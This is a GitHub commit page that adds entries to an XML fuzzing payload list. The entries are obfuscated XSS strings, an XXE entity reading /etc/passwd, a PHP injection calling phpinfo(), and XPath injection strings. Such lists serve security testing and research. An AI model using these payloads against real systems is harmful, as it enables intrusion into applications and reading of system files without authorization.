Skip to content

Commit

Permalink
Update XML_FUZZ
Browse files Browse the repository at this point in the history
Adding some payloads
  • Loading branch information
shipcod3 committed Nov 19, 2014
1 parent 9e5c7ad commit 3570ebc
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions Fuzzing/XML_FUZZ
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,11 @@
]>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
]>
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
<name>','')); phpinfo(); exit;/*</name>


## Element and Attrib Values
Expand Down Expand Up @@ -48,3 +53,5 @@ false
{{Tnn96}}
{= Tnn96}
{{= Tnn96}}
count(/child::node())
x' or name()='username' or 'x'='y

0 comments on commit 3570ebc

Please sign in to comment.